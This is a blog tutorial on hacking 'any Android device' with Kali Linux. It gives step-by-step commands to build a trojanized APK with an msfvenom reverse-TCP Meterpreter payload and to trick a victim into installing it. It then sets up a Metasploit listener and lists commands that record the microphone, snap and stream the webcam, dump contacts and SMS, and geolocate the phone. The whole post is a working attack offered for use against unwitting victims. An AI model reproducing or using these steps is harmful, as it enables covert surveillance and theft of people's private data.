Hack Android Phone using Kali Linux

Hello,  Dear reader your welcome. My today topic How to Hack any Android Device using Kali Linux ? 
Dear readers you know about the Kali Linux 
What is kali Linux?
                      Kali Linux is one of the best passion operating system of white hat hackers, security researchers and pentester. It gives advanced penetration testing tool and its ease of use implies that it should be a part of every security professional’s toolbox.


1. Kali Linux OS (Metasploit framework Preloded)
2. Android Device

Must Read:{ How To Install KaliLinux In Android Phone Manully }

So, let’s get started.

STEP1: Go to your kali linux Desktop and open the Terminal Window.

STEP2: Set payload and create Custom window executable.
 root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST= LPORT=4444 R > Hack.apk

Note: If you don’t know your LHOST(Local IP), Open new Terminal Window and type command ifconfig.
Replace the LHOST with your IP address.
Your apk file is being saved in the Home folder.

STEP3: Short stories the victim download the malicious APK  file and install it. After Victim open the application.

STEP4:  Start the Metasploit Framework Console as follows :
 root@kali:-# msfconsole

STEP5: Now write the following command and after writing each command hit enter.
msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Write the IP address in The LHOST Part, Payload Handler is  Started!

STEP6: When the victims clicks on the app in his phone, meterpreter session will be established.
After that the you can try the following Command:

    – record_mic         
    – webcam_snap    
    – webcam_stream
    – dump_contacts  
    – dump_sms         
    – geolocate            

             If  you like this post please don’t  forget to share it with friends also please socialize it . thank you so much ,stay tune with this blog and blog’s admin Mr. Aditya Singh

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